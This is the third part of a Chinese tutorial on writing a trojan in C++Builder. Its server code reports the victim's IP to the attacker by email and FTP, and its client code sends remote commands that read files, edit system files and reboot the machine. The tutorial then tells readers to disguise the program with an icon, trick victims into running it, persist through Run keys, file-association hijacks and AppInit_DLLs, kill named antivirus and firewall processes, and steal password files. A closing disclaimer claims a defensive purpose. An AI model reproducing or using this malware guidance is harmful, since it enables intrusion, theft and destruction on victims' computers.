木马是如何编写的(三)
上次已编写完服务器端的各种功能,但还差容错部分还未完成,下面我们Go on! 其代码如下(照敲不误 ^_^):
{
END:;
Socket-〉Close();
//关闭服务
ServerSocket1-〉Active =true;
//再次打开服务
if (NMSMTP1-〉Connected) NMSMTP1-〉Disconnect();
//如果SMTP服务器已连接则断开
NMSMTP1-〉Host = "smtp.163.net";
//选一个好用的SMTP服务器,如163、263、sina和btamail
NMSMTP1-〉UserID = "";
//你SMTP的ID
try
{
NMSMTP1-〉Connect();
//再次连接
}
catch(...)
{
goto NextTime;
//跳到NextTime
}
NMSMTP1-〉PostMessage-〉FromAddress ="I don't know!";
//受害者的Email地址
NMSMTP1-〉PostMessage-〉FromName = "Casualty";
//受害者的名字
NMSMTP1-〉PostMessage-〉ToAddress-〉Text = "crossbow@8848.net";
//将信发到我的邮箱,这一步很关键
NMSMTP1-〉PostMessage-〉Body-〉Text = AnsiString("Server Running on:") + NMSMTP1-〉LocalIP ;
//信的内容提示你“服务器正在运行”,并且告诉你受害者的目前的IP地址,以便连接
NMSMTP1-〉PostMessage-〉Subject = "Server Running Now!";
//信的主题
NMSMTP1-〉SendMail();
//发送!
return;
//返回
NextTime:
NMFTP1-〉Host = "ftp.go.163.com";
//你的FTP服务器的地址
NMFTP1-〉UserID = "";
//你的用户ID
NMFTP1-〉Port = 21;
//FTP端口号,一般为21
NMFTP1-〉Password = "";
//你的FTP的密码
if(NMFTP1-〉Connected) NMFTP1-〉Disconnect();
//如果已连接就断开
try
{
NMFTP1-〉Connect();
//再连接
}
catch(...)
{
return;
//返回
}
AnsiString SendToSite = "Server Running on: " + NMFTP1-〉RemoteIP;
//受害者的IP地址
FILE * Upload;
Upload = fopen(NMFTP1-〉RemoteIP.c_str(),"w+");
//创建一个新文件准备写,如果已存在就覆盖
fwrite(SendToSite.c_str(),sizeof(char),SendToSite.Length(),Upload);
//写入以上的SendToSite的内容
fclose(Upload);
//写完后关闭此文件
NMFTP1-〉RemoveDir("public_html");
//删除public_html目录
NMFTP1-〉Upload(NMFTP1-〉RemoteIP, NMFTP1-〉RemoteIP);
//上传!
}
啊,超长的OnClientRead事件终于写完了。最后别忘了要在此服务器源码文件中添加以下头文件:
#include 〈stdlib.h〉
#include 〈dirent.h〉
#include 〈fcntl.h〉
#include 〈dos.h〉
#include 〈sys\stat.h〉
#include 〈winbase.h〉
#include 〈stdio.h〉
#include 〈process.h〉
#include 〈io.h〉
#include 〈mmsystem.h〉
至此,服务器端(Server)程序已全部完工!(终于可以好好歇歇了!)别慌!以上代码只是完成了整个木马程序的一半。(“扑通”,有人晕倒了!)下面我们就将乘胜追击——搞定客户端程序(Client)!
客户端程序其实是很简单的。另新建一个Form,添加一个ClientSocket(和ServerSocket在相同的页下),再添加四个 Editbox,命名为Edit1,Edit2,Edit3和Edit4,最后添加一个Button,Caption为“发送”。Edit1是输入命令用 的,Edit2是准备输入目标机的IP地址用的,Edit3是输入连接端口号用的,Edit4是用来输入欲添加的语句或显示命令执行的结果的。(头是不是 有点大了?!)
双击Button1,在Button1Click事件中添加如下代码:
{
if((Edit2-〉Text=="")||(Edit3-〉Text==""))return;
//如果输入IP地址框或输入端口号框有一个为空,就什么也不作
ClientSocket1-〉Address=Edit2-〉Text;
//目标IP地址
ClientSocket1-〉Port=atoi(Edit2-〉Text.c_str());
//目标端口号,本例中的44444
ClientSocket1-〉Open();
//连接!
}
选中CilentSocket1控件,双击OnConnectt事件,在ClientSocket1Connect下添加如下代码:
{
if((Edit1-〉Text=="edit conf 1")||(Edit1-〉Text=="edit conf 2"))
//如果是要编辑autoexec.bat或config.sys
Socket-〉SendText(Edit1-〉Text+Edit4-〉Text);
//发送命令和欲添加的语句
else
Socket-〉SendText(Edit1-〉Text);
//否则只发送命令
}
双击OnRead事件,在ClientSocket1Read下添加如下代码:
{
AnsiString ReadIn = Socket-〉ReceiveText();
//读入收到的返回信息
Edit4-〉Text="";
//清空编辑框
FILE *fp;
fp = fopen("ReadIn.tmp","w");
//建立一个临时文件ReadIn.tmp
fwrite(ReadIn.c_str(),1,10000,fp);
//写入信息
fclose(fp);
//关闭之
Edit4-〉Lines-〉LoadFromFile("ReadIn.tmp");
//在编辑框中显示返回的信息
}
为了敲完命令后直接回车就可以发送,我们可以使Button1的代码共享。双击Edit1的OnKeyPress命令,输入:
{
if(Key==VK_RETURN)Button1Click(Sender);
//如果敲的是回车键,就和点击Button1一样的效果
}
最后再添加以下头文件:
#include "stdlib.h"
#include "winbase.h"
#include "fcntl.h"
#include "stdio.h"
终于写完了!!!(如果你对简陋的界面不满意,可以自己用BCB中丰富的控件好好完善完善嘛!)按下Ctrl+F9进行编译链接吧!对于Server, 你可以选一个足以迷惑人的图标(我选的是一个目录模样的图标)进行编译,这样不但受害者容易中招,而且便于隐藏自己。
接下来就把Server程序寄给受害者,诱骗他(她)执行,在你得到他(她)的IP后(这不用我教吧?),就启动Client程序,敲入 “edit conf 1”就编辑Autoexec.bat文件,敲入“edit conf 2”就编辑Config.sys文件,敲入 “dir xxx”(xxx是目录名)就可以看到目录和文件,敲“type xxx”就可以察看任何文件,输入“open”,弹出目标机的光驱托 盘,“close”就收入托盘,输入“swap”就可以交换受害者的鼠标左右键,输入“reboot”就启动目标机……不用我多说了吧?
以上只是一个简单的例子,真正写起木马来要解决的技术问题比这多得多,这得需要扎实的编程功底和丰富的经验。如下的问题就值得仔细考虑:
首先是程序的大小问题,本程序经编译链接后得到的可执行文件竟有400多K,用Aspack1.07压了一下也还有200多K。可以看出不必要的 Form是应该去掉的;并且尽量由自己调用底层的API函数,而尽量少使用Borland打好包的VCL控件;要尽量使用汇编语言(BCB支持C++和汇 编混编),不但速度会加快,而且大小可以小很多,毕竟木马是越小越好。
还有启动方式的选择。出了Win.ini、System.ini之外,也还是那几个注册表键值,如:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
都 已被其他的木马用烂了。现在又开始对exe、dll和txt文件的关联程序动手脚了(如冰河和广外女生)。这里涉及到参数传递的问题。得到 ParamStr()函数传来的参数,启动自己后再启动与之关联的程序,并将参数传递给它,这样就完成了一次“双启动”,而受害者丝毫感觉不到有任何异 常。具体键值如:
与exe文件建立关联:HKEY_CLASSES_ROOT\exefile\shell\open\command
与txt文件建立关联:HKEY_CLASSES_ROOT\txtfile\shell\open\command
与dll文件建立关联:HKEY_CLASSES_ROOT\dllfile\shell\open\command
等,当然还可以自己扩充。目前还有一种新方法:在
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Windows 下添加如下键值 "AppInit_DLLs"="Server.dll",这就把Server.dll注册为系统启动时必须加载的模块(你应该把木马编 译成DLL)。下次开机时,木马以动态链接库形式被加载,存在于系统进程中。因为没有它自己的PID(Process ID 进程识别号),所以在NT的 任务管理器中也看不见(不过在“系统信息”——“软件环境”——“已加载的32位模块”中还是可以详细看到当前内存中加载的每一个模块的),这样做的目的 是可以使自己的程序更加隐蔽,提高木马的生存能力。
木马的功能还可以大大扩充。你可以充分发挥你的想象力——比如上传、下载、新建、改名、移动 文件,截图存为jpg文件传回,录音监听成Wav文件,录像成AVI文件,弹光驱,读软驱,关机,重启,不停地挂起,胡乱切换分辨率(烧掉你的显示器), 发对话框,不停地打开资源管理器直到死机,杀掉Kernel32.dll进程使机器暴死,交换鼠标左右键,固定鼠标,限制鼠标活动范围,鼠标不听指挥到处 乱窜,记录击键记录(记录上网口令,这需要深入了解钩子(Hook)技术, 如键盘钩子和鼠标钩子),窃取重要的密码文件如pwl和sam文件,格式化磁盘,乱写磁盘扇区(像病毒大爆发),破坏零磁道,乱写BIOS(像CIH), 胡乱设置CMOS,加密MBR、HDPT和FAT(像江民炸弹)……真是琳琅满目、心狠手辣呀!而且实现起来并不是很复杂,只不过后面几项需要比较扎实的 汇编功底而已(有几项要用到Vxd技术)。唉!路漫漫其修远兮,吾将上下而求索……
如果你想更安全地执行你的入侵活动,就应该像广外女生一样可以杀掉防火墙和杀毒软件的进程。防火墙和杀毒软件监视的是特征码,如果你是新木马,它就不吱 一声;但是如果你打开不寻常的端口,它就会跳出来报警。因此最好的办法是启动后立即分析当前进程,查找有没有常见防火墙和杀毒软件的进程,如果有就杀无 赦。比如常见的如:Lockdown,天网防火墙,网络卫兵,kv3000,瑞星,金山毒霸,Pc-Cillin,Panda,Mcafee,Norton和CheckPoint。杀掉后,再在特定的内存地址中作一个标记,使它们误以为自己已启动,因此不会再次启动自己了。
针对来自反汇编工具的威胁。如果有人试图将你的木马程序反汇编,他成功后,你的一切秘密就暴露在他的面前了,因此,我们要想办法保护自己的作品。首先想 到的是条件跳转,条件跳转对于反向工程来说并不有趣。没有循环,只是跳转,作为使偷窃者令人头痛的路障。这样,就没有简单的反向操作可以执行了。陷阱,另 一个我不太肯定,但听说有程序使用的方法:用CRC校验你的EXE文件,如果它被改变了,不要显示典型错误信息,而给予偷窃者致命的一击。
最后如果你需要它完成任务后可以自己删除自己,我提示你:退出前建立一个批处理文件,加入循环删除本exe文件和本批处理文件自己的命令后保存,执行它,再放心地退出。你可以试一下,所有文件都消失了吧?!这叫“踏雪无痕”。
入侵安装了防火墙的机器最好使用自己编写的木马,这样不光防火墙不会报警,而且你自己心里也坦然一些——毕竟是自己的作品吗!如果你是系统管理员,那就 请你不要偷懒,不仅要经常扫描1024以下的端口,而且包括1024以上的高端端口也要仔细扫描,65535个端口一个也不能漏。因为许多木马打开的就是 高端端口(如本例中的4444)。
写在最后:上面例子的用意并不是教你去如何攻击他人,目的只是让你了解木马的工作原理和简单的编写步骤,以便更好地防范和杀除木马,维护我们自己应有的网络安全。因此,请列位看官好自为之,不要乱下杀手啊!